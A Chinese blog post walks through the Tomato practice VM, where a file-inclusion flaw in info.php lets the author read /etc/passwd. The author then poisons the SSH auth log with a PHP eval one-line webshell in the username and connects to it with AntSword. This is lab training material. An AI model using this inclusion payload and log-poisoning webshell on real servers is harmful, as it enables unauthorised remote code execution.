文件包含漏洞Tomato靶机渗透_详解

已于 2024-07-29 22:40:20 修改
阅读量427 收藏 2
点赞数 11
文章标签: 网络安全 web安全 安全
于 2024-07-29 22:37:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59151303/article/details/140782991
版权

一、导入靶机

将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径

虚拟机设置里修改网络状态为NAT模式

二、信息收集

1、主机发现

用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141

2、端口扫描

用御剑端口扫描扫描全端口

发现21、2211、80、25、1100和8888端口开启

3、访问Web服务

网页上访问192.168.204.141,出现一个大特码头

访问192.168.47.129:8888,弹出一个登录框

4、目录扫描

使用kali的dirb进行目录扫描:dirb http://192.168.204.141/

扫描结果如下

访问antibot_image目录

发现有一个info.php文件

点开发现是一个PHP的探针文件

查看info.php的网页源码,发现存在文件包含漏洞

三、漏洞利用

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-

扫描出来2211,是ssh远程连接端口

此时我们报错连接 2211

ssh '<?php @eval($_POST['cmd']);?>'@192.168.204.141 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

该目录下发现多了一些报错信息,木马大概率写入成功,

使用蚁剑进行连接,上传了一句话木马的路径:

http://192.168.204.141/antibot_image/antibots/info.php?image=/var/log/auth.log

连接密码是刚刚POST传入的:cmd

成功登陆到靶机

m0_59151303
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tomato靶机渗透测试
weixin_49340699的博客
07-28 1254
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
文件包含漏洞tomato靶机
m0_63944205的博客
07-29 56
进入目录我们发现了info.php查看源代码发现存在文件包含漏洞。所以我们就是要将上传的木马会在日志中体现。用sentos连接到目标主机生成日志。访问antibot_image/然后我们测试连接,并成功连接。这里我们想到它的日志文件。
vulnhub靶机渗透 Tomato
RestoreJustice的博客
03-19 373
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137。需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录,被记入日志。使用了第一个,失败了。
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1613
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞
[Tomato] tomato_dual_13.05.0041[bcm5357测试版] .trx
07-09
中兴h118n路由器固件,tomato多wan,最高4wan。亲测可用。
tomato_dual_15.02.0068_固件_tomato_
10-03
8M版本除了基本功能外,还集成了USB应用程序,这可能包括文件共享、打印服务、网络备份等,极大地增强了路由器的实用性。 标签“固件 tomato”强调了这是与Tomato固件相关的更新,通常这些固件更新会带来性能提升、...
tomatodetection.zip_Tomato Detection_tomato image_机器视觉_水果检测_番茄
07-14
标题中的"Tomato Detection"指的是一个项目或算法,旨在通过机器视觉技术来识别和定位图像中的番茄。在农业、食品安全和质量控制等领域,这样的技术有着广泛的应用,可以帮助自动化番茄的采摘、分拣和质量评估过程。...
tomato_dual_1.23.0487
01-04
从压缩包子文件的文件名称列表 "tomato_dual_1.23" 来看,这些文件很可能是固件的安装包或者升级文件。通常,安装过程包括将这些文件上传到路由器的管理界面,然后按照指导进行升级操作。升级前,确保路由器型号与...
Tomato_1_28固件
01-13
一线多拨,你懂得。讨厌网速慢的可以试试,在下载上有所提高
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 1012
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-29 224
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
最新发布
互联网架构小马的博客
07-29 505
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 636
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 470
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1127
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微软蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 765
近日,一场由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的软件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
学习网络安全 为什么Linux首择Kali Linux? 以及如何正确的使用Kali Linux
一名初中生
07-25 614
什么是Kali Linux?
plant_leaf_diseases_dataset中tomato
10-27
plant_leaf_diseases_dataset是一个植物叶病害的数据集,其中包含了关于番茄的信息。 番茄是一种常见的蔬菜作物,也是全球重要的经济作物之一。然而,番茄也容易受到各种叶病害的侵袭,这会严重影响其产量和品质。因此,了解番茄的叶病害是非常重要的。 plant_leaf_diseases_dataset中的番茄数据集提供了关于番茄叶病害的图像和相关信息。这些信息可以帮助农民和植物病理学家识别和处理番茄病害。 数据集中的图像展示了各种叶病害的症状,例如普通疫病、叶霉病、斑点病等。每张图像都标注了相应的病害类别,这对于训练机器学习算法或开展研究非常有用。 通过分析番茄叶病害的数据集,我们可以得到许多有价值的信息。首先,我们可以了解番茄病害的发病率和分布情况,这有助于制定相应的病害防治策略。其次,通过比较不同病害的症状和发展过程,我们可以更好地理解它们的差异和共性,进一步深入研究其病因和传播途径。 此外,该数据集对于研究新的病害治疗方法和培育抗病品种也非常有价值。我们可以利用这些图像来测试新的药物或治疗方案,评估其对病害的治疗效果。同时,根据番茄病害数据集中的信息,我们可以挑选出抗病性强的番茄品种,并在进一步的研究中加以培育和利用。 总而言之,plant_leaf_diseases_dataset中的番茄数据集对于了解和研究番茄叶病害非常有帮助。通过对这些数据的分析和应用,我们可以改善番茄的生产管理,减少病害损失,提高番茄产量和质量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值